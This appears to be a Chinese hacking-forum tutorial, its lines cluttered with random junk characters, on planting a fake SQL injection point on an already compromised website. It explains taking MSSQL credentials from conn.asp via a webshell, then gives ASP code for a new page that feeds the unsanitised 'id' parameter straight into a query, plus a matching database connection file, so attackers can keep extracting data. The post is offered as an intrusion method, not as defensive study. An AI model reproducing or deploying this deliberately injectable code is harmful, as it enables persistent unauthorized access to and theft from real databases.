自己构造注入点方便入侵
% c$ Z; \% T" K; @, ~) E3 k2 b1 |! }9 P0 L1 }4 a3 Z% o! q
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
# l# b: n6 { K# s
: \% n! R2 v+ D1 X \! P4 R+ }这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!, F( E7 N4 V! a1 A5 K5 M q, O
. Q% ^8 s% I* A8 L. N$ _( A( T首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
5 d9 N( d# U. z" B2 B6 W! |; `8 a3 K& F
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表2 `* l) l9 v7 c. x) Y* z
; u2 p1 @* d8 r5 ~1 z/ L9 u
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:; {+ p! R8 L( M9 `' O5 j, y/ e
4 ^* x, `& Y: J1 e( R, ]- q
程序代码
3 N- e% R6 }- \& w- @<!--#include file="xx.asp"-->
1 N3 ?9 J) ~5 o+ g3 a1 q6 L/ Z<%3 r) v) R7 i. H* p9 g, G+ }- H2 r
set rs=server.createobject("ADODB.recordset")
) ~- ]! |+ X2 t" `/ hid = request("id")! A* b! @7 S: V$ U# D( C, D
strSQL = "select * from admin where id=" & id
% Y' `' h/ R5 v6 C7 S. D- ors.open strSQL,conn,1,3
, T- B, T" L4 k, ors.close
& Y [2 G: T* G! {%>
; j' h, M( |( ?0 M! _/ S" |: p* t+ U; X g) M- i* a
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在8 Q4 f" K. A5 G: P7 H
5 U2 z! h* ~, D Q你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
7 _& x& S | d% M
3 @5 a8 z! j B& ?然后就要构造一个连接数据库的文件了,代码如下:
0 I. `3 b& J$ \9 Y2 s程序代码
* s) T) i+ t* z8 i<% ( p6 ^9 D5 _, ^9 g
strSQLServerName = "000.000.000.000" '服务器名称或地址, F. k5 @3 r! b5 s
strSQLDBUserName = "sqlname" '数据库帐号
& y4 |9 H+ D* ^strSQLDBPassword = "sqlpass" '数据库密码
* u- p+ ~0 y V6 k4 LstrSQLDBName = "sqldataname" '数据库名称
9 M! a7 r' @* O/ Y. PSet conn = Server.CreateObject("ADODB.Connection")
+ E# p' l3 G- \0 K3 O* sstrCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
) A, ]+ o8 p+ qconn.open strCon
' e9 [ ~; u# [4 \%>8 T7 y5 Q( a& D: u' A( W
4 k4 d- Y' M: s' \5 ]! Y, u) s这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
/ Q9 L/ m- a: U1 y
3 R# [! n- {; C4 `7 j, ?就这样,正常情况下,就OK了,伪造成功……
2 l/ ?$ W& D# c8 ?& X
& I$ d z L! u+ L 如果有什么问题可以提出来大家一起探讨解决。 |